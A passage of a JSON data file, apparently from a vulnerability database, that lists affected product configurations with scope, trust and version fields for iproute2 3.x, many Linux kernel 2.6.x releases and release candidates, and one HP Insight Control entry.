        "model": "iproute2",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "iproute2",
        "version": "3.1.0"
      },
      {
        "model": "iproute2",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "iproute2",
        "version": "3.0.0"
      },
      {
        "model": "iproute2",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "iproute2",
        "version": "3.2.0"
      },
      {
        "model": "iproute2",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "stephen hemminger",
        "version": "3.3.0"
      },
      {
        "model": "iproute2",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "iproute2",
        "version": "3.2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.6"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.15"
      },
      {
        "model": "kernel 2.6.36-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.3"
      },
      {
        "model": "kernel 2.6.18-8.1.8.el5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.16"
      },
      {
        "model": "kernel 2.6.21-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.1"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel 2.6.31-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.2"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "kernel 2.6.39-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel git2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel git1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.14"
      },
      {
        "model": "kernel 2.6.36-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.36.2"
      },
      {
        "model": "kernel 2.6.35-rc5-git5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel 2.6.38-git18",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel git4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.5"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.6"
      },
      {
        "model": "kernel rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.267"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "kernel 2.6.32-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.22-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel 2.6.33-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc9",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "kernel 2.6.36-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.12"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel 2.6.24-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.35-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.09"
      },
      {
        "model": "kernel 2.6.29-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.37-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel 2.6.33-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel -git7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel 2.6.31-git11",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel 2.6.29-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.45"
      },
      {
        "model": "kernel 2.6.31-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38"
      },
      {
        "model": "kernel 2.6.31-rc5-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.39"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.50"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel 2.6.35-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "kernel -git1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.6"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel 2.6.32-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.1"
      },
      {
        "model": "kernel -git14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.36"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.9"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel 2.6.22-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.35"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel 2.6.36-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.8"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.1"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.27"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.7"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel 2.6.35-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.6"
      },
      {
        "model": "kernel 2.6.33-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "kernel 2.6.34-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel 2.6.37-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.24"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.5"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18-53"
      },
      {
        "model": "kernel 2.6.34-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.40"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
